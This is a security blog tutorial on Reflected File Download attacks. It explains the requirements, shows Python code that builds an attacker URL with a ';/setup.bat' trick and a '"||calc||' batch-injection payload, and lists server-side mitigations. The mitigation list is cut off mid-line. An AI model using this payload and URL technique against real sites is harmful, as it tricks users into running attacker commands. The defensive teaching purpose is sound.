Reflected File Download (slide 12)
We now have all three requirements in place:
● We can control the user input that is reflected in the response.
● We can control the file extension of the download.
● The response is served as a downloadable file.
4. Exploitation
Whoever knows how to wield a sword can make many kills.
Now that all three requirements are met, it is time to exploit the vulnerability.
If you observe how a “.bat” file behaves, you will realize that every command in the file is executed directly by the Windows shell (cmd.exe).
For example, take a file called “mkdir.bat” whose only content is the line “mkdir tmp”. Whenever that file is run, the line is handed to the Windows shell and a new folder called “tmp” is created.
In the same way, if you look at where our user input appears inside the downloaded file, you will see that we can inject a custom command there: the reflected text becomes a line of the batch file, and the shell runs it just like “mkdir tmp”.
Reflected File Download (slide 19)
● Add a Content-Disposition: attachment; filename=… header with a fixed file name, so the attacker can no longer control the name or extension of the downloaded file.
● Don’t allow the application to accept permissive input; validate the reflected parameter against a strict allowlist.
● Limit the callback function for “;” “
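The exploitation from section 4 and the mitigations listed above, as one added example that is not code from the original page or from the author: a hypothetical JSONP-style endpoint reflects its `callback` parameter in front of the JSON body (requirement 1); the attacker picks the download name with the `;/setup.bat` path-parameter trick described in the cited Hafif paper (requirement 2; whether a given server routes such URLs this way is an assumption you must verify per target); and the classic `"||calc||` payload from the same paper becomes the first line of the downloaded batch file. The `cmd_commands` function is a deliberately simplified model of how cmd.exe splits a line on its command separators, written to make the payload structure visible, not a faithful cmd.exe parser. The hardened builder applies the three mitigations: an identifier-only callback, a fixed `Content-Disposition` filename, and `X-Content-Type-Options: nosniff`. All host names, data and function names are constructed for this example.

```python
import json
import re
from typing import Dict, List, Tuple
from urllib.parse import quote

# Constructed sample data for the hypothetical endpoint.
SAMPLE_DATA = {"status": "ok", "user": "guest"}


def build_jsonp_response(callback: str, data: dict) -> str:
    """Vulnerable server side: the user-controlled callback is reflected verbatim."""
    return f"{callback}({json.dumps(data)});"


def build_rfd_url(base: str, filename: str, callback: str) -> str:
    """Attacker side: pick the file name and extension (requirement 2).

    Path-parameter trick from the cited Hafif paper: servers that treat ';...' in
    the last path segment as a path parameter still route the request to the same
    endpoint, while the browser names the download after 'setup.bat'.
    Assumption: the target behaves this way; verify it before relying on it."""
    return f"{base};/{filename}?callback={quote(callback, safe='')}"


# Simplified model of cmd.exe: split one .bat line on the command separators.
# Real cmd.exe also handles quoting, pipes and redirection; splitting on the
# separators is enough to show why the injected command gets executed.
CMD_SEPARATORS = re.compile(r"\|\||&&|&")


def cmd_commands(line: str) -> List[str]:
    return [part.strip() for part in CMD_SEPARATORS.split(line)]


# Classic RFD payload (Hafif): close whatever token precedes the reflection with
# a double quote, then "||calc||". cmd.exe tries the first token, which is not a
# valid command, so "||" falls through and runs calc.
PAYLOAD = '"||calc||'

# Hardened server side: only a plain JavaScript identifier may be a callback.
SAFE_CALLBACK = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]{0,63}")


def is_safe_callback(callback: str) -> bool:
    return SAFE_CALLBACK.fullmatch(callback) is not None


def build_jsonp_response_hardened(callback: str, data: dict) -> Tuple[Dict[str, str], str]:
    """Returns (headers, body) with the mitigations the page recommends applied."""
    if not is_safe_callback(callback):
        raise ValueError("callback must be a plain identifier")
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        # Fixed filename: the attacker can no longer choose the extension.
        "Content-Disposition": 'attachment; filename="api.json"',
        # Stops the browser from sniffing the body into another content type.
        "X-Content-Type-Options": "nosniff",
    }
    return headers, f"{callback}({json.dumps(data)});"


if __name__ == "__main__":
    url = build_rfd_url("https://api.example.test/lookup", "setup.bat", PAYLOAD)
    body = build_jsonp_response(PAYLOAD, SAMPLE_DATA)
    print("attacker URL:   ", url)
    print("downloaded .bat:", body)
    print("cmd.exe runs:   ", cmd_commands(body))  # second command is 'calc'
    try:
        build_jsonp_response_hardened(PAYLOAD, SAMPLE_DATA)
    except ValueError as exc:
        print("hardened endpoint rejects the payload:", exc)
```

Running the block prints the crafted URL, the first line of the file the victim would download, the command list the simplified cmd.exe model derives from it (with `calc` in second position), and the rejection the hardened builder raises for the same payload. The `callback` allowlist is the single change that removes the injection; the fixed `Content-Disposition` filename is what removes the attacker's control over the extension even if some other parameter is ever reflected.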
Conclusion
After analysing this vulnerability, we can say that there is always some vulnerability or weakness in modern web applications, regardless of the platform they are built on. We should look for every possible avenue of attack.
Many organisations still think this is not a vulnerability because it affects the user's (victim's) machine rather than the application itself. But on closer inspection, the vulnerability exists because of the vulnerable application, and it is that application's users who are affected. There is another point to consider: this vulnerability exploits the trust users place in the websites they visit most.
Source: https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
Narendra Bhati
@imnarendrabhati
https://websecgeeks.com
narendra.bhati@websecgeeks.com